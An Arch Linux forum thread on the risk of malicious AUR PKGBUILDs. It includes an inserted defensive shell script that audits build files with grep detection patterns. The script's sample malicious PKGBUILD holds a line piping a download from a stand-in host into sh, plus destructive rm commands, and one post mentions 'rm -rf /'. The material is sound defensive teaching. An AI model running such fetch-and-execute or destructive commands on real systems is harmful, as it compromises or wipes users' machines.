
#1 2009-07-15 19:19:25

eyolf
Member
From: Copenhagen
Registered: 2005-11-29
Posts: 339

"Highly recommended for security reasons"

I've always wondered: whenever I install something via yaourt, I get the reminder that I should check the PKGBUILD and the install files, "for security reasons". I acknowledge that, of course, but:

1. has anyone ever suffered any damage from malicious lines of script in a PKGBUILD? And I'm not thinking of damage of the "x broke app y" kind, which can be restored by reinstalling the old package, but the deliberate attack, and/or the unrecoverable damage.

2. How easy/difficult would it be to make such damage? (If someone has an answer to #2, any examples should perhaps be kept vague...)

A third question would be: how secure is Arch/Pacman?


#2 2009-07-15 19:31:06

brisbin33
Member
From: boston, ma
Registered: 2008-07-24
Posts: 1,799

Re: "Highly recommended for security reasons"

anyone can write anything in a PKGBUILD's build() function.  this function is then executed --as root-- via yaourt.

that means there could be something as obvious as rm -rf /, or as subtle as some weird obfuscated forkbomb, who knows.  i doubt that it's ever happened but it's entirely possible.

for this reason, it's recommended to build packages as normal user with makepkg (where damage is contained by your file permissions) and only do the actual installing as root via pacman -U.

with yaourt, you either run it as root or not; and you can't install w/o root privileges.  my personal AUR script does everything as user, then calls sudo pacman -U (and i have a NOPASSWD line in /etc/sudoers for that command).  this, i think, is a better way to maintain security while still automating aur activities.

as with anything in linux, it is up to _you_ to manage your own level of risk; and determine what you're comfortable doing with/to _your_ system


#3 2009-07-15 19:31:59

Dusty
Schwag Merchant
From: Medicine Hat, Alberta, Canada
Registered: 2004-01-18
Posts: 5,986

Re: "Highly recommended for security reasons"

eyolf wrote:

2. How easy/difficult would it be to make such damage? (If someone has an answer to #2, any examples should perhaps be kept vague...)

the pkgbuild downloads a source file and installs it on your computer. There's nothing stopping someone from uploading a pkgbuild that downloads a malicious source file instead of the one you expected. It's really, really easy. To the best of my knowledge it hasn't happened yet but it's only a matter of time. Check every pkgbuild every time... I suppose if you know and trust the maintainer of that particular file you'd be safe though.

A third question would be: how secure is Arch/Pacman?

Arch has all the standard security tools and is typically more up to date than most distros, so is quite secure in that aspect. Pacman doesn't support package signing yet which means that any mirror could, in theory, inject a malicious package into the repositories, as could someone with control of any portion of the path between the mirror and your computer.

Dusty

Last edited by Dusty (2009-07-15 19:34:23)


#4 2009-07-15 19:59:42

Mr.Elendig
#archlinux@freenode channel op
From: The intertubes
Registered: 2004-11-07
Posts: 4,097

Re: "Highly recommended for security reasons"

I've seen quite a few PKGBUILDs that do stupid things, like 'rm /usr/share/foobar' instead of 'rm $pkgdir/usr/share/foobar' and similar.

The worst I've seen did 'rm -rf /home/mpd' in post_remove()


Evil #archlinux@libera.chat channel op and general support dude.

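The checks and the workflow the posts above describe, as an added example that is not code from the thread, from yaourt or from makepkg: a small audit of a PKGBUILD or .install file for the mistakes Mr.Elendig names in #4 (rm aimed at the live system instead of $pkgdir), the swapped-tarball risk Dusty raises in #3 (no checksum array, fetching outside source=()), and brisbin33's build-as-user, install-as-root sequence from #2. The function names, the example.invalid URLs and the three sample files written at the bottom are constructed for illustration; makepkg, pacman -U and the post_remove() hook are the real tools, and no flags beyond those shown are assumed.

```shell
#!/bin/sh
# Added example (not from the thread): audit an AUR PKGBUILD/.install file for
# the red flags discussed above, then build as an unprivileged user and hand
# only the final install to root. Sample files below are constructed.

# audit_pkgbuild FILE: print one line per finding; return 1 if any were found.
audit_pkgbuild() {
    f=$1
    rc=0
    # rm/mv/chmod/chown on an absolute path not under $pkgdir or $srcdir acts on
    # the live system, not the staging dir ('rm /usr/share/foobar', or
    # 'rm -rf /home/mpd' in post_remove, which pacman runs as root).
    if grep -nE '(^|[[:space:];&|])(rm|mv|chmod|chown)[[:space:]]+([^|;&]*[[:space:]]+)?/[A-Za-z]' "$f" \
            | grep -vE 'pkgdir|srcdir'; then
        echo "  ^ $f: touches a path outside \$pkgdir/\$srcdir"
        rc=1
    fi
    # Fetching inside a function bypasses source=() and whatever checksums it has.
    if grep -nE '(^|[[:space:]])(curl|wget|git[[:space:]]+clone)[[:space:]]' "$f"; then
        echo "  ^ $f: downloads outside source=(); nothing verifies what arrives"
        rc=1
    fi
    # A build or install script has no reason to escalate privileges itself.
    if grep -nE '(^|[[:space:]])(sudo|su)[[:space:]]' "$f"; then
        echo "  ^ $f: tries to escalate privileges"
        rc=1
    fi
    case $f in
    *PKGBUILD*)
        # Without a checksum array, a tarball swapped on the server goes unnoticed.
        if ! grep -qE '^(md5|sha1|sha256|sha384|sha512)sums=' "$f"; then
            echo "  $f: no checksum array for source=()"
            rc=1
        fi
        # Plaintext transport: the checksum in the PKGBUILD is the only protection.
        if grep -nE '(http|ftp)://' "$f"; then
            echo "  ^ $f: fetched over plaintext; only the checksum protects it"
        fi
        ;;
    esac
    return $rc
}

# build_and_install TARBALL: unpack, audit and run makepkg (which executes
# build() from the PKGBUILD) as the invoking user, so a hostile build() can only
# damage that user's files; pacman -U is the single step that runs as root.
build_and_install() {
    tarball=$1
    [ "$(id -u)" -ne 0 ] || { echo "refusing to build as root" >&2; return 1; }
    workdir=$(mktemp -d)
    tar -xzf "$tarball" -C "$workdir"
    pkgbuild=$(find "$workdir" -name PKGBUILD | head -n 1)
    [ -n "$pkgbuild" ] || { echo "no PKGBUILD in $tarball" >&2; return 1; }
    dir=$(dirname "$pkgbuild")
    findings=0
    for f in "$pkgbuild" "$dir"/*.install; do
        [ -f "$f" ] || continue
        audit_pkgbuild "$f" || findings=1
    done
    if [ "$findings" -ne 0 ]; then
        printf 'Findings above; read %s yourself and continue? [y/N] ' "$dir"
        read -r ans
        [ "$ans" = y ] || return 1
    fi
    (cd "$dir" && makepkg) || return 1   # build() runs with this user's rights only
    sudo pacman -U "$dir"/*.pkg.tar.*    # the only command that needs root
}

# Constructed samples so the audit can be exercised offline.
SAMPLE_DIR=$(mktemp -d)
cat > "$SAMPLE_DIR/PKGBUILD.good" <<'EOF'
pkgname=foobar
pkgver=1.0
source=("https://example.invalid/foobar-$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
build() {
  cd "$srcdir/$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
  rm -rf "$pkgdir/usr/share/foobar/examples"
}
EOF
cat > "$SAMPLE_DIR/PKGBUILD.bad" <<'EOF'
pkgname=foobar
pkgver=1.0
source=("http://example.invalid/foobar-$pkgver.tar.gz")
build() {
  cd "$srcdir/$pkgname-$pkgver"
  wget -q http://example.invalid/helper.sh -O - | sh
  make DESTDIR="$pkgdir" install
  rm /usr/share/foobar
}
EOF
cat > "$SAMPLE_DIR/foobar.install" <<'EOF'
post_remove() {
  rm -rf /home/mpd
}
EOF

for f in "$SAMPLE_DIR"/PKGBUILD.good "$SAMPLE_DIR"/PKGBUILD.bad "$SAMPLE_DIR"/foobar.install; do
    if audit_pkgbuild "$f"; then echo "$f: clean"; fi
done

# With a tarball argument, run the real workflow (interactive; needs makepkg and pacman).
if [ $# -gt 0 ]; then build_and_install "$1"; fi
```

The grep heuristics are deliberately coarse: they catch the patterns named in the thread, not an obfuscated payload, so the prompt to read the file yourself is the real control and the audit only tells you where to look first. On the sudoers point from #2: a NOPASSWD rule for pacman -U means anything already running as that user, a hostile build() included, can install an arbitrary package as root, so the user/root split above is only as strong as the password prompt you keep in front of pacman -U.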

#5 2009-07-15 20:14:38

stefan1975
Member
From: 53 6e 65 65 6b
Registered: 2007-04-16
Posts: 195

Re: "Highly recommended for security reasons"

well security in Arch is like all things in Arch imho. It is as secure as you make it yourself. By default it does not do a lot in the way of security though:

- no (iptables) firewall by default
- no SeLinux (by default)
- no security alerts
- no package signing
- sparse documentation on packages/updates
- relative ease by which yaourt could be misused to inject malicious code into your system (when run as root or sudo with NOPASSWD)
- no password complexity enforcing
- no LUKS disk encryption by default during installation
- no ssh by default

none of these are necessarily bad imho, it is just the way Arch works, like a swiss army knife. It can be made secure but you have to DIY, much unlike for example fedora/RHEL with selinux/encryption/iptables/ssh/complexity/package-signing by default. Neither is better or worse than the other, it is just something someone has to take into account when selecting his distro of choice and securing it to the level he needs. for a secure OOTB experience i would not select Arch, but then again linux in any form is already much more secure than Windows.

stefan


"root# su - bofh"
OS: F10_x64, Arch, Centos5.3, RHEL4.7, RHEL5.3
Desktop Hardware: Dell Precision M65 laptop, core2duo, 2gb, 80gb 7200rpm
Registered linux user #459910 since 1998


#6 2009-07-15 20:23:35

keenerd
Package Maintainer (PM)
Registered: 2007-02-22
Posts: 647

Re: "Highly recommended for security reasons"

brisbin33 wrote:

with yaourt, you either run it as root or not; and you can't install w/o root privileges.  my personal AUR script does everything as user, then calls sudo pacman -U (and i have a NOPASSWD line in /etc/sudoers for that command).  this, i think, is a better way to maintain security while still automating aur activities.

I have not looked at the code, but that description does not match its behavior.  If you launch it as root, it will yell at you to run it as user.  If you run it as user, it will build the package as user.  Then it will ask for your password in order to attempt "sudo pacman".  Then it will ask for root's password to "su root pacman".  Yaourt will also handle updates and provides several useful extensions to pacman's options.  "-Su --devel" and "-Su --downgrade" for exciting and dull days, respectively.


#7 2009-07-15 20:33:29

brisbin33
Member
From: boston, ma
Registered: 2008-07-24
Posts: 1,799

Re: "Highly recommended for security reasons"

keenerd wrote:
brisbin33 wrote:

with yaourt, you either run it as root or not; and you can't install w/o root privileges.  my personal AUR script does everything as user, then calls sudo pacman -U (and i have a NOPASSWD line in /etc/sudoers for that command).  this, i think, is a better way to maintain security while still automating aur activities.

I have not looked at the code, but that description does not match its behavior.  If you launch it as root, it will yell at you to run it as user.  If you run it as user, it will build the package as user.  Then it will ask for your password in order to attempt "sudo pacman".  Then it will ask for root's password to "su root pacman".  Yaourt will also handle updates and provides several useful extensions to pacman's options.  "-Su --devel" and "-Su --downgrade" for exciting and dull days, respectively.

well how bout that.  nevermind then... ignore my uneducated ramblings.  i see the lore of yaourt, but i like to keep separate tools for pacman and aur, and my script does all that fun checking for aur updates stuff too


#8 2009-07-17 17:55:39

R00KIE
Forum Fellow
From: Between a computer and a chair
Registered: 2008-09-14
Posts: 4,734

Re: "Highly recommended for security reasons"

Regarding question number three I agree with stefan1975, with arch you build your security yourself, you learn how to configure the system and the security tools and you decide why you need them and learn how they work. You start with a system with less security measures and evolve to a system with more security measures.

With systems that bring the whole lot out of the box things can get in your way if you don't understand how things work, then probably you end up disabling some things until you can figure out how to use them.


R00KIE
Tm90aGluZyB0byBzZWUgaGVyZSwgbW92ZSBhbG9uZy4K
